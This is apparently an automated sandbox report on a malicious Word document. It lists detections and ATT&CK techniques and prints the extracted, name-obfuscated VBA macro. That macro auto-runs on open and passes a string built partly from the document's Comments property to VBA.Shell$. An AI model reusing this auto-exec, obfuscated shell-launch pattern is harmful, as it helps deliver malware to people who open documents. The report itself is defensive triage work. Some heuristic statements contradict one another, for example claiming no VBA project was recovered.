Verdict: MALICIOUS
Risk Score: 232

Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is designed to execute a PowerShell command, likely to download and run a second-stage payload. The document body uses a common lure to trick users into enabling macros, which is a typical characteristic of spearphishing attachments.
Heuristics (9)

- ClamAV: Doc.Macro.DollarShell-6346616-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: the `VBA.Shell$` call inside `Function nYrtvtK()`, reproduced verbatim in the extracted script preview under Extracted artifacts.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Name = "Module1" Sub autoopen() nYrtvtK`
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7531 bytes |

SHA-256: 3e65c4974b68b49da74756db4914177b33349eaf7c3f9e115b0650b1b3216ac0

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 452 of 526 identifiers look randomly generated (e.g. 'SSLmxMYVHTc') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub autoopen()
nYrtvtK
End Sub
Function nYrtvtK()
dXButXdfASB = "BeffKNnMB" + "gYNDKeUhHy" + "WKamRRDfz" + "eaaYXRFfB" + "fsNkBKZkHE" + "hDsWWPBbyht" + "WrvGyLFu" + afcbyYVBWe = "wLGwUHGt" + "dMagEaC" + "nPsFLGXhfrf" + "NNSuupCsAM" + "ANPbwbeHG" + "kXSFfSwdzRd" + "GTxtpRuEd" + LLAWNxUFCK = "WEFYskg" + "CYRavxpDLd" + "vagBdxK" + "yzZNVNf" + "BnhswKsTdhr" + "tnGhMFhtGw" + "gZRUKEFK" + epfNaxrXbb = "tHMfXrmg" + "MDvkrUpp" + "UxrWzYry" + "vLWYKPLK" + "nhzwpctxHg" + "YvMwfYA" + "CzCckNefGKT" + eNkttxxFX = "aFdnEeAuZ" + "YpDEYxsy" + "HwZMfVs" + "vPSLptSVUh" + "pPzEngHK" + "ZKBhLGbB" + "FDvnrhS" + "ZnNmcNt"
XekAzhh = "LDgvhmk" + "mBAASMk" + "zAwgFWLUM" + "CchyUvDvAK" + "hsptEkaRx" + "tHDhwFUC" + "TsuAfghztt" + dCmSUZGX = "ddkscYP" + "MbhygCcXwK" + "cnYLkVttAYr" + "ywfHstBG" + "HtMCKSdyx" + "dEdtcbbbSc" + "RZGSBDkbV" + yNmyWXDbkTd = "kEBszKsMbeE" + "NFdAmRfKks" + "GSGuLRuNG" + "nxdFMRp" + "KLYsNdGvsrL" + "FGdAeWC" + "wXHYxZNd" + hZUKtCN = "SnHexFfPR" + "PRdrdPThza" + "UVKzxPzSSRG" + "tdxZEFbDk" + "fZxdSLWnKds" + "dgfPzNxSW" + "yuDYvyybcRT" + "HpGFAdpPS"
bRMkgHD = "yXEvKfShLS" + "dGAvzDEzDGz" + "NsFsYKD" + "ZGMFTEEsULd" + "vHpnMDze" + "VKRYSrU" + "exrRaTgwLF" + eGPdEyxN = "MBehgdxA" + "yWdHcLkNDCy" + "AkBhxsaRBV" + "SpSuWfuNnCU" + "UBKWCDT" + "udVCbFdRY" + "xcWBhUrVTXw" + dcLWxuL = "UeYZhuNgKLc" + "HeFsSHzMbWZ" + "VgHrnVH" + "TuuKbMuVZem" + "XKPDVfSU" + "VhKcHpMevvw" + "MpBksHDBd" + "wzSUcHMVELb"
MGzAPyZ = "dAaLEvp" + "bBGXZwXh" + "sKkGBBdgD" + "ezmnDzrmy" + "SYaTYauAgVY" + "tdvkZDydF" + "yVWPLSncCN" + EgXemFvL = "dXWfKeeaRxc" + "mnPpEHAwCd" + "vwupAZfLeUT" + "SKaYVsXMgkD" + "dFugsAUHTwr" + "LhXvrSHNb" + "AEBaKYuDr" + PvNtFdXErth = "HnfdwGCuegU" + "wZcNLgcc" + "crWLaUDkF" + "uftyXYDNh" + "ErfBcTezADd" + "EFUTzRmZ" + "tNyZEft" + GxAaUxdZ = "rKCttbnkR" + "bZVXGdL" + "gzBavbrPc" + "EwasHazA" + "zpbNtFyKVs" + "vFgYHWypgh" + "mYdGGuXbTdZ" + zuWtwRxW = "THKxkeMur" + "yCWVNpP" + "EKcpgdEPxRx" + "PzefNCrwdZ" + "xnpygmfdxZ" + "bmnSNhBdE" + "ckvmsManu" + YPRLYmSs = "vhEShZkrLV" + "kxfdpbm" + "TCDrHXtsCc" + "yXhyKzS" + "kPranzTGzUv" + "LBxxstS" + "sBPWseZp" + "yFeNNKwME"
yrcNDyPf = "zNEWnbCaZ" + "TBRtyYsRNs" + "HykUDbG" + "NxwrCfFYU" + "sxAdVMr" + "GdZNWEe" + "wDMxXmbh" + GDApzzFntnK = "HySteNR" + "XLKTzmNgGp" + "szwDVUk" + "pbzsxgGSxy" + "FbwrKRKBLgp" + "hYwudbyCnmA" + "DNugCdNfuxD" + XhHMstu = "bRBzMKdp" + "aERPzhZkdA" + "pZBMLgm" + "vxvPDEv" + "mFLrwBnAP" + "GunVxZzeB" + "BtCvMyAD" + ynatwEsWV = "fHxNpCKHhye" + "AenzUdbgh" + "dzxNefc" + "swSrAYnTFw" + "yLpKRvFMuyT" + "TVTUZBFS" + "TRbUdKCA" + xzWrvDFacL = "ECxTMwDB" + "WwSZPpRvC" + "vvRxtHcXsny" + "ykyKPgafb" + "sYbDWAudx" + "nHPGCwRXfcD" + "YxcxsefV" + "NrBAMKUTC"
vBedLpdS = "ppgdZpXpKU" + "hDAEpbPhFX" + "SvCXMRp" + "kmHWCcwSy" + "hNLeWnwt" + "vszhkuev" + "bXHBwygfht" + EyvFdAc = "VSwdmYyTvh" + "AwcdMeaYh" + "DyGVNkyvB" + "ZuYdpLyDrg" + "hDerXZNeUGc" + "UEKsFBXVYcC" + "ZCBAZgMvkLs" + "CYcKSEUEe"
CcBacrTnHv = "FeCCdsFGpG" + "RzXyPxmG" + "WRspAsGs" + "PTwmDHgmkS" + "DSdvecCR" + "TKnXzaSzgMC" + "dNzUgyKW" + ArLuZSNBFPW = "vXRUsDy" + "FfvNLgZ" + "wPFdtBL" + "SyyPkZsryGC" + "gynaTgeef" + "fkWDuVb" + "RGvzBzVu" + ttKcEbC = "YCAgbzbf" + "RkTZCyXNkn" + "TnDgphP" + "WXcykUZtf" + "CXmnGLmAmG" + "VHRunahvwkB" + "PMSBMbgdz" + "wDZzuAeMFa"
rgunGKACxt = "LTWSuAVNXeH" + "NhXhHxe" + "TPrnGxU" + "SwARZbPM" + "GScNMumzyG" + "VnCvSPK" + "tCpUueXrD" + fHmWwzBZv = "CmfSvKmgx" + "yVzBStD" + "GrBknMnSx" + "AgdPLwyyK" + "VDAvzUgF" + "kZfXVUBGunx" + "NcdRFkavnsM" + sdnuVDxC = "BkcTgFgX" + "StRSrvC" + "ZFKHSxHEzZ" + "hYvswzHAdgd" + "vGGubApwdtK" + "LvBXaAERV" + "yPTLKGtnWD" + "RnchDDkh"
VBA.Shell$ "" + MZvCWhMp + yaPXgCVs + VCnMBVXgUE + bkSTrgpkMb + wMSAXaPkKrR + YEcKHVXBb + NvcybHP + wRPVPgnKD + mYueRaGZK + MfDHAmdCN + ActiveDocument.BuiltInDocumentProperties("Co" + "mments") + MZvCWhMp + yaPXgCVs + VCnMBVXgUE + bkSTrgpkMb + wMSAXaPkKrR + YEcKHVXBb + NvcybHP + wRPVPgnKD + mYueRaGZK + MfDHAmdCN + xudcrHU, 0
VYmvgZhFWWf = "AtUHynn" + "dmySAGA" + "RhttnDsyvu" + "EyRKmmS" + "LSsZfdZGL" + "PrfKALb" + "YdRAeHU" + emHeCCHSDHs = "LtNxafDThU" + "nfXmRFKzN" + "NwTrBrWfZ" + "yLGWzuyNt" + "CcPakgUxCD" + "EkcpFCCASLd" + "XFgZvHmZcHx" + AWpYPrhp = "SSDCPfAEnH" + "YavxhphHcDv" + "DBNgaCG" + "KPRbzaC" + "HFWxVSrx" + "xXKbTtBt" + "gKgeYCTR" + xhdachH = "tDXthEgA" + "HMHSwSXMT" + "bLGNWGTb" + "VVXnTUpBP" + "HnzPahRMZrZ" + "VdZvdRtWsSE" + "fBkXfevUp" + "UYWRTUxf"
UMNWUFnnv = "vhHzAtDdsv" + "pbspLTRRuxg" + "zsVVTAh" + "TsAMMCNVAP" + "ewxztBfxBp" + "nabHbzSC" + "mustdcT" + NNypadHFyzx = "HBnfEpZNDf" + "cLRxPhzFzD" + "vsYNyFC" + "hnUgwBcaX" + "eBBcAkHM" + "fGBuFGNUcwT" + "xfVCeYGUw" + nuyXpCFPg = "srCEHSazXs" + "NbuCWUKHx" + "uaSufCpuR" + "kMGDafPA" + "rgwWbUUMd" + "mgnCdVZrRM" + "RwHXTXgyvP" + mdUXUzx = "ugrZFnkbn" + "ntAcuNWu" + "tmTxtXs" + "yYWfmFZtrG" + "KWhSnHX" + "hZLDrhDA" + "fdtMTtYF" + UrnChthgSm = "aYcPKaKHFgE" + "pMukpfeKfWU" + "RywSyHSBWWZ" + "XaNDbwcDPm" + "nfeCruDCSd" + "sGbfbxdKC" + "nvAYPtFEt" + "nCwwdALRLuf"
zczstKypV = "vNBUpGMeWT" + "vSDyBCdDB" + "UTkAwUwyeu" + "ttEdfATcGk" + "trrCrygxb" + "taTmfvSdfpS" + "gLgTXGxL" + eAgTxVvV = "eHASfbHbMG" + "WzYfVwZMs" + "hZtghcfR" + "DsSLLSCDvf" + "XgDAWxzDChf" + "ezeGSfUKg" + "RanZfWmHKd" + "sRvkMLg"
UrwMmvDU = "LswnHteCwrN" + "BWnMsNbzYNV" + "VCcCvBaSdz" + "WCbGxkuzCk" + "aRKSmRdYdu" + "CAbnxMmxPdL" + "VDSPbHFE" + yMtNaEeHtGA = "pdRAzEsLGN" + "PZvBemad" + "YWDugXWUT" + "ZWnKKAFYPFg" + "vAmydcR" + "ztwEwLvDa" + "eXauBwFUYp" + abtTfvUS = "pKYYWFBUS" + "XnSEfSYr" + "pWTEsxLvgr" + "TAwhxKK" + "wGKdWhazrfY" + "KnuXwfCUEm" + "nAegVwt" + kPBKNzUnrAK = "nBzhUcuKzF" + "NZSvHnddmz" + "ZscUSERWvW" + "UttryrnTvYB" + "CSDgeSwXT" + "DCRxaGL" + "MgDDbGK" + tfkNmZWdy = "fpyPpbr" + "SgehMxtee" + "SGFBfsRPU" + "YvCCexL" + "xShuTbM" + "XPPbUNtyYz" + "eNpAyrX" + nLCTCAmD = "shHftGrHkL" + "DbFfDSeWZT" + "mGvkbvwsL" + "pAcLAEt" + "XHCMDntSvG" + "xnNaHSPPXB" + "YPesPENSZg" + "FrFErYB"
KZsVFBz = "PuMnPxN" + "sVfruSv" + "wHRbxtZHSA" + "CwhdkDbSA" + "MyKrkDLymwT" + "DcxscephuG" + "WDHPPaUd" + XKcHpBMwgxG = "MpzNKuXnff" + "MRFvVFD" + "LMXshrGZxN" + "zKAtHexg" + "aDmhWRbyU" + "SWCEDSzS" + "PdkYZxgA" + PSMxUynvRf = "vZaMrSZ" + "hkprmBUB" + "aUgaGWwySxM" + "DMBwzTHbeN" + "kAUcNXsbshD" + "LZuhFEnSe" + "nxWGArt" + tcYvZyE = "CFSWnuwufFG" + "PNUFXxypLG" + "pTdfTXUkRn" + "mSKvYCu" + "hZDkHPu" + "YUdCUUgM" + "yvgBggnK" + "pfevftp"
yMmTRuyzgy = "PEvCabAfY" + "buLRYeTGCK" + "nDRrvzx" + "TxyfRSWFsbK" + "HZerggN" + "aafuerK" + "cTKUdpSfvF" + wpShHzbYY = "yWFySvyf" + "PauUrnTc" + "kCRTyDyYT" + "vMYEkFePd" + "BGaPbWGB" + "YRemRdMgh" + "VVupLywBxay" + ENnsAKaVUW = "wkhPEtnWDF" + "CmSGtHe" + "zbzYdwYW" + "dpRPbUkWP" + "LemfdKw" + "HpkXCLu" + "RpZsKNnxpvH" + RayUXSkrG = "msSWZSKna" + "kFrFzThUgYH" + "VfbgWXFkLh" + "wBXYyaK" + "SAeEFCd" + "SBLkPCpB" + "VrMrmZuas" + "ZEWBRSzBbcw"
YdGtrdhz = "naSwDcCs" + "tmswZCtbALK" + "PYytfru" + "nyNLSEYeBn" + "NMdXEMrb" + "hWrBAtCMF" + "dHzmftf" + XtnckLmusaX = "NWFKSEWCf" + "FUVCkrygYET" + "LEugZTLT" + "rTwcNpCPN" + "zmDSYupn" + "YSTNLpkdvE" + "YAREFzpUwpA" + "YZBZTrHmLgm"
GRduHgeyN = "TbAkyBY" + "LuSuGvaxv" + "nmrSAwws" + "DtBcUAK" + "DzfuxaaEzh" + "bEhWRRKFtUP" + "CWaEBScwET" + bVYFrfkrdzS = "pewUcraX" + "zgFADTw" + "bpDmpsxwHsW" + "wyCyyww" + "GugtPYWxmW" + "kdTSFuHbsh" + "SSLmxMYVHTc" + "SnkfyMBzBP"
End Function